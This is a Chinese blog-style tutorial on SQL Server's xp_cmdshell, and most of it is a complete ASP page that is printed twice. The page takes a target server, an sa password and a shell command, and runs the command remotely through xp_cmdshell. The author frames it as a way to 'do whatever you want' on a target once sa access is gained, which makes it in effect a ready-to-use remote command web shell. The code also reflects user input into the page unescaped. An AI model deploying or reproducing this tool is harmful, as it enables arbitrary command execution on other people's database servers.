教你SQLSERVER扩展存储过程XP_CMDSHELL的简单应用
程序员文章站
2022-04-07 08:17:30
XP_CMDSHELL存储过程是执行本机的CMD命令,要求系统登陆有SA权限,也就是说如果获得SQLSERVER的SA命令,那就可以在目标机为所欲为了,知名软件“流光”使用的应该也是这个... 08-10-08...
xp_cmdshell存储过程是执行本机的cmd命令,要求系统登陆有sa权限,也就是说如果获得sqlserver的sa命令,那就可以在目标机为所欲为了,知名软件“流光”使用的应该也是这个存储过程来实现在目标机上的操作。
下面是我写的一个简单的应用页面(asp),代码如下。
cmd.asp
<%@language="vbscript" codepage="936"%>
<!doctype html public "-//w3c//dtd html 4.01 transitional//en" "http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title>sqlserver_xp_cmdshell实例_魔术师·刘</title>
<style type="text/css">
<!--
body{
font-size:13px;
line-height:20px;
width:760;
scrollbar-face-color: #2896e1;
scrollbar-shadow-color: #6cb4d8;
scrollbar-arrow-color: #f0f0f0;
scrollbar-darkshadow-color: #2896e1;
scrollbar-base-color: #2896e1;
background-image: url(images/bg.gif);
}
.lbr{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:1px solid #336699;
border-bottom:1px solid #336699;
}
.all_h {
border: 1px solid #336699;
}
.input {
border: 1px solid #336699;
background-color:#eceafd;
}
.lb{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:0px solid #336699;
border-bottom:1px solid #336699;
}
.n1 {font-weight:bold;color:#339933;font-size:13px;}
.n2 {font-weight:bold;color:#ff0000;font-size:13px;}
-->
</style>
</head> <body>
<%if request("cmd")<>"" then%>
<table width=400 border=0 align=center cellpadding=5 cellspacing=0>
<tr align=center>
<td height=30 class=all_h bgcolor=#b3e0ff ><span class=n1>xp_cmdshell请求结果</span></td>
</tr>
<% dim connstr,conn,rs,i
connstr="provider=sqloledb.1;persist security info=false;server="&request("server")&";uid=sa;pwd="&request("pwd")&";database=master"
'connstr="provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master"
set conn=server.createobject("adodb.connection")
conn.open connstr
set rs=server.createobject("adodb.recordset")
set rs=conn.execute("xp_cmdshell '"&replace(replace(request("cmd"),"'","''"),chr(34),"''")&"'")
i=0
while not rs.eof
if not isnull(rs(0)) then
if i mod 2 =0 then
response.write "<tr><td class=""lbr"" bgcolor=""#def3ff"">"&rs(0)&"</td></tr>"
else
response.write "<tr><td class=""lbr"">"&rs(0)&"</td></tr>"
end if
i=i 1
end if
rs.movenext
wend
rs.close
set rs=nothing
conn.close
set conn=nothing
%>
</table>
<%end if%>
<form name="form1" method="post" action="">
<table width=400 border=0 align=center cellpadding=5 cellspacing=0>
<tr align=center>
<td height=30 colspan=2 class=all_h bgcolor=#b3e0ff ><span class=n1>xp_cmdshell实例</span></td>
</tr>
<tr align=center bgcolor=#def3ff>
<td width=26% class=lb><strong>服务器</strong></td>
<td width=74% class=lbr><div align="left">
<input name="server" type="text" id="server" class="input" size="20" value="<%=request("server")%>">
</div></td>
</tr>
<tr align=center >
<td class=lb><b>sa密码 </b></td>
<td class=lbr><div align="left"><span class=n1>
<input name="pwd" type="text" id="pwd" class="input" size="20" value="<%=request("pwd")%>">
</span></div></td>
</tr>
<tr align=center bgcolor=#def3ff>
<td width=26% class=lb><strong>cmd命令</strong></td>
<td width=74% class=lbr><div align="left">
<input name="cmd" type="text" id="cmd" class="input" size="20" value="<%=request("cmd")%>">
</div></td>
</tr>
<tr align=center >
<td colspan="2" class=lbr><div align="center"><b> </b>
<input type="submit" name="submit" value=" 提交command命令 " class="input">
</div></td>
</tr>
</table>
</form>
</body>
</html>
下面是我写的一个简单的应用页面(asp),代码如下。
cmd.asp
<%@language="vbscript" codepage="936"%>
<!doctype html public "-//w3c//dtd html 4.01 transitional//en" "http://www.w3.org/tr/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312">
<title>sqlserver_xp_cmdshell实例_魔术师·刘</title>
<style type="text/css">
<!--
body{
font-size:13px;
line-height:20px;
width:760;
scrollbar-face-color: #2896e1;
scrollbar-shadow-color: #6cb4d8;
scrollbar-arrow-color: #f0f0f0;
scrollbar-darkshadow-color: #2896e1;
scrollbar-base-color: #2896e1;
background-image: url(images/bg.gif);
}
.lbr{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:1px solid #336699;
border-bottom:1px solid #336699;
}
.all_h {
border: 1px solid #336699;
}
.input {
border: 1px solid #336699;
background-color:#eceafd;
}
.lb{
border-top:0px solid #336699;
border-left:1px solid #336699;
border-right:0px solid #336699;
border-bottom:1px solid #336699;
}
.n1 {font-weight:bold;color:#339933;font-size:13px;}
.n2 {font-weight:bold;color:#ff0000;font-size:13px;}
-->
</style>
</head> <body>
<%if request("cmd")<>"" then%>
<table width=400 border=0 align=center cellpadding=5 cellspacing=0>
<tr align=center>
<td height=30 class=all_h bgcolor=#b3e0ff ><span class=n1>xp_cmdshell请求结果</span></td>
</tr>
<% dim connstr,conn,rs,i
connstr="provider=sqloledb.1;persist security info=false;server="&request("server")&";uid=sa;pwd="&request("pwd")&";database=master"
'connstr="provider=sqloledb.1;persist security info=false;server=(local);uid=sa;pwd=www.zhi.net;database=master"
set conn=server.createobject("adodb.connection")
conn.open connstr
set rs=server.createobject("adodb.recordset")
set rs=conn.execute("xp_cmdshell '"&replace(replace(request("cmd"),"'","''"),chr(34),"''")&"'")
i=0
while not rs.eof
if not isnull(rs(0)) then
if i mod 2 =0 then
response.write "<tr><td class=""lbr"" bgcolor=""#def3ff"">"&rs(0)&"</td></tr>"
else
response.write "<tr><td class=""lbr"">"&rs(0)&"</td></tr>"
end if
i=i 1
end if
rs.movenext
wend
rs.close
set rs=nothing
conn.close
set conn=nothing
%>
</table>
<%end if%>
<form name="form1" method="post" action="">
<table width=400 border=0 align=center cellpadding=5 cellspacing=0>
<tr align=center>
<td height=30 colspan=2 class=all_h bgcolor=#b3e0ff ><span class=n1>xp_cmdshell实例</span></td>
</tr>
<tr align=center bgcolor=#def3ff>
<td width=26% class=lb><strong>服务器</strong></td>
<td width=74% class=lbr><div align="left">
<input name="server" type="text" id="server" class="input" size="20" value="<%=request("server")%>">
</div></td>
</tr>
<tr align=center >
<td class=lb><b>sa密码 </b></td>
<td class=lbr><div align="left"><span class=n1>
<input name="pwd" type="text" id="pwd" class="input" size="20" value="<%=request("pwd")%>">
</span></div></td>
</tr>
<tr align=center bgcolor=#def3ff>
<td width=26% class=lb><strong>cmd命令</strong></td>
<td width=74% class=lbr><div align="left">
<input name="cmd" type="text" id="cmd" class="input" size="20" value="<%=request("cmd")%>">
</div></td>
</tr>
<tr align=center >
<td colspan="2" class=lbr><div align="center"><b> </b>
<input type="submit" name="submit" value=" 提交command命令 " class="input">
</div></td>
</tr>
</table>
</form>
</body>
</html>
上一篇: Rootkit隐形技术教程(图)